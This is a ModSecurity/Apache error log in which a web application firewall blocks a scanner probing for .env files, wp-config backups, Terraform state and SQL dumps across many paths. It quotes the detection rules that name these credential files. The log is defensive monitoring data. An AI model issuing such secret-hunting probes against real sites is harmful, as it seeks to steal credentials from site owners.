[Tue May 26 15:25:24.403321 2026] [security2:error] [pid 707292:tid 707437] [client 195.178.110.199:46600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/qa/.env"] [unique_id "ahVuDNKAqlRPSIEFAuuAdAAAAJQ"]
[Tue May 26 15:25:24.563706 2026] [security2:error] [pid 707292:tid 707498] [client 195.178.110.199:53588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/public/.env"] [unique_id "ahVuDNKAqlRPSIEFAuuAfwAAANE"]
[Tue May 26 15:25:25.382955 2026] [security2:error] [pid 707292:tid 707518] [client 195.178.110.199:53516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/s3/.env.bak"] [unique_id "ahVuDdKAqlRPSIEFAuuAtgAAAOU"]
[Tue May 26 15:25:25.383137 2026] [security2:error] [pid 707292:tid 707520] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuDNKAqlRPSIEFAuuAmgAAAOc"]
[Tue May 26 15:25:25.409847 2026] [security2:error] [pid 707292:tid 707536] [client 195.178.110.199:46638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/server/.env"] [unique_id "ahVuDdKAqlRPSIEFAuuAtwAAAPc"]
[Tue May 26 15:25:25.419184 2026] [security2:error] [pid 707292:tid 707530] [client 195.178.110.199:46600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/server/api/.env"] [unique_id "ahVuDdKAqlRPSIEFAuuAuAAAAPE"]
[Tue May 26 15:25:25.447667 2026] [security2:error] [pid 707292:tid 707497] [client 195.178.110.199:53586] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/server/backend/.env"] [unique_id "ahVuDdKAqlRPSIEFAuuAugAAANA"]
[Tue May 26 15:25:25.633974 2026] [security2:error] [pid 707292:tid 707538] [client 195.178.110.199:53544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/service/.env"] [unique_id "ahVuDdKAqlRPSIEFAuuAywAAAPk"]
[Tue May 26 15:25:26.737110 2026] [security2:error] [pid 707292:tid 707471] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/services/.env"] [unique_id "ahVuDtKAqlRPSIEFAuuA9wAAALY"]
[Tue May 26 15:25:27.394982 2026] [security2:error] [pid 707292:tid 707458] [client 195.178.110.199:53544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/shared/.env"] [unique_id "ahVuD9KAqlRPSIEFAuuBDwAAAKk"]
[Tue May 26 15:25:27.532445 2026] [security2:error] [pid 707292:tid 707508] [client 195.178.110.199:46600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/shop/.env"] [unique_id "ahVuD9KAqlRPSIEFAuuBFAAAANs"]
[Tue May 26 15:25:27.817694 2026] [security2:error] [pid 707292:tid 707459] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuD9KAqlRPSIEFAuuBDgAAAKo"]
[Tue May 26 15:25:27.854857 2026] [security2:error] [pid 707292:tid 707476] [client 195.178.110.199:53520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/src/.env"] [unique_id "ahVuD9KAqlRPSIEFAuuBKwAAALs"]
[Tue May 26 15:25:27.866792 2026] [security2:error] [pid 707292:tid 707477] [client 20.104.227.76:14145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.shahvishaal.moes-art.com"] [uri "/ioxi-o.php"] [unique_id "ahVuD9KAqlRPSIEFAuuBLAAAALw"]
[Tue May 26 15:25:27.976495 2026] [security2:error] [pid 707292:tid 707493] [client 195.178.110.199:53558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/staging/.env"] [unique_id "ahVuD9KAqlRPSIEFAuuBMgAAAMw"]
[Tue May 26 15:25:28.088854 2026] [security2:error] [pid 707292:tid 707516] [client 195.178.110.199:46566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/stg/.env"] [unique_id "ahVuENKAqlRPSIEFAuuBPAAAAOM"]
[Tue May 26 15:25:28.130807 2026] [security2:error] [pid 707292:tid 707479] [client 195.178.110.199:53558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/srv/.env"] [unique_id "ahVuENKAqlRPSIEFAuuBQAAAAL4"]
[Tue May 26 15:25:28.193046 2026] [security2:error] [pid 707292:tid 707536] [client 195.178.110.199:53588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/stage/.env"] [unique_id "ahVuENKAqlRPSIEFAuuBSgAAAPc"]
[Tue May 26 15:25:28.296758 2026] [security2:error] [pid 707292:tid 707466] [client 14.162.131.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuD9KAqlRPSIEFAuuBKQAAALE"]
[Tue May 26 15:25:28.532276 2026] [security2:error] [pid 707292:tid 707437] [client 195.178.110.199:46638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/stripe/.env"] [unique_id "ahVuENKAqlRPSIEFAuuBWAAAAJQ"]
[Tue May 26 15:25:28.719377 2026] [security2:error] [pid 707292:tid 707441] [client 195.178.110.199:46600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/v1/.env"] [unique_id "ahVuENKAqlRPSIEFAuuBZQAAAJg"]
[Tue May 26 15:25:28.720543 2026] [security2:error] [pid 707292:tid 707475] [client 195.178.110.199:60972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/terraform.tfstate.backup"] [unique_id "ahVuENKAqlRPSIEFAuuBZgAAALo"]
[Tue May 26 15:25:28.786430 2026] [security2:error] [pid 707292:tid 707498] [client 195.178.110.199:53586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/test.php"] [unique_id "ahVuENKAqlRPSIEFAuuBaQAAANE"]
[Tue May 26 15:25:28.837713 2026] [security2:error] [pid 707292:tid 707442] [client 195.178.110.199:53576] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/v2/.env"] [unique_id "ahVuENKAqlRPSIEFAuuBagAAAJk"]
[Tue May 26 15:25:28.847045 2026] [security2:error] [pid 707292:tid 707505] [client 195.178.110.199:53520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/v3/.env"] [unique_id "ahVuENKAqlRPSIEFAuuBawAAANg"]
[Tue May 26 15:25:28.928240 2026] [security2:error] [pid 707292:tid 707478] [client 195.178.110.199:53516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/user/.env"] [unique_id "ahVuENKAqlRPSIEFAuuBdwAAAL0"]
[Tue May 26 15:25:28.979831 2026] [security2:error] [pid 707292:tid 707418] [remote 207.46.13.153:30415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 153.13.46.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gcirsm.org.in"] [uri "/rsm-councilmeetingdays.php"] [unique_id "ahVuENKAqlRPSIEFAuuBdAAA3H0"]
[Tue May 26 15:25:29.114949 2026] [security2:error] [pid 707292:tid 707527] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuENKAqlRPSIEFAuuBYwAAAO4"]
[Tue May 26 15:25:29.118874 2026] [security2:error] [pid 707292:tid 707444] [client 195.178.110.199:53516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/test/.env"] [unique_id "ahVuEdKAqlRPSIEFAuuBfQAAAJs"]
[Tue May 26 15:25:29.290111 2026] [security2:error] [pid 707292:tid 707524] [client 195.178.110.199:60972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/var/www/html/.env"] [unique_id "ahVuEdKAqlRPSIEFAuuBiQAAAOs"]
[Tue May 26 15:25:29.321679 2026] [security2:error] [pid 707292:tid 707530] [client 195.178.110.199:53558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/web/.env"] [unique_id "ahVuEdKAqlRPSIEFAuuBjQAAAPE"]
[Tue May 26 15:25:29.532311 2026] [security2:error] [pid 707292:tid 707472] [client 195.178.110.199:46566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/var/www/.env"] [unique_id "ahVuEdKAqlRPSIEFAuuBmQAAALc"]
[Tue May 26 15:25:29.702130 2026] [security2:error] [pid 707292:tid 707487] [client 195.178.110.199:53544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/website/.env"] [unique_id "ahVuEdKAqlRPSIEFAuuBpQAAAMY"]
[Tue May 26 15:25:29.720155 2026] [security2:error] [pid 707292:tid 707426] [client 195.178.110.199:53566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php"] [unique_id "ahVuEdKAqlRPSIEFAuuBqgAAAIk"]
[Tue May 26 15:25:29.770070 2026] [security2:error] [pid 707292:tid 707539] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.new"] [unique_id "ahVuEdKAqlRPSIEFAuuBrAAAAPo"]
[Tue May 26 15:25:29.887515 2026] [security2:error] [pid 707292:tid 707452] [client 195.178.110.199:46638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-content/mysql.sql"] [unique_id "ahVuEdKAqlRPSIEFAuuBtgAAAKM"]
[Tue May 26 15:25:29.996214 2026] [security2:error] [pid 707292:tid 707517] [client 195.178.110.199:46620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.bak"] [unique_id "ahVuEdKAqlRPSIEFAuuBvAAAAOQ"]
[Tue May 26 15:25:30.077343 2026] [security2:error] [pid 707292:tid 707442] [client 195.178.110.199:53576] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.old"] [unique_id "ahVuEtKAqlRPSIEFAuuBvQAAAJk"]
[Tue May 26 15:25:30.436199 2026] [proxy:warn] [pid 707292:tid 707527] [client 66.132.195.74:44866] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 15:25:30.436234 2026] [proxy:error] [pid 707292:tid 707527] (70014)End of file found: [client 66.132.195.74:44866] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 66.132.195.74 ()
[Tue May 26 15:25:31.760995 2026] [security2:error] [pid 707292:tid 707469] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuE9KAqlRPSIEFAuuB5gAAALQ"]
[Tue May 26 15:25:33.435933 2026] [security2:error] [pid 707292:tid 707515] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuFdKAqlRPSIEFAuuCGAAAAOI"]
[Tue May 26 15:25:36.049047 2026] [security2:error] [pid 707292:tid 707436] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuF9KAqlRPSIEFAuuCagAAAJM"]
[Tue May 26 15:25:36.715579 2026] [security2:error] [pid 707292:tid 707543] [client 114.119.138.48:56529] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.srsglobalsoft.com"] [uri "/vivainnova/"] [unique_id "ahVuGNKAqlRPSIEFAuuCkAAAAP4"], referer: http://www.srsglobalsoft.com/
[Tue May 26 15:25:38.117956 2026] [security2:error] [pid 707292:tid 707514] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuGdKAqlRPSIEFAuuCrAAAAOE"]
[Tue May 26 15:25:40.277470 2026] [security2:error] [pid 707292:tid 707497] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuG9KAqlRPSIEFAuuC3gAAANA"]
[Tue May 26 15:25:40.677666 2026] [security2:error] [pid 707292:tid 707503] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVuHNKAqlRPSIEFAuuC7gAAANY"], referer: https://www.bloggertarget.com
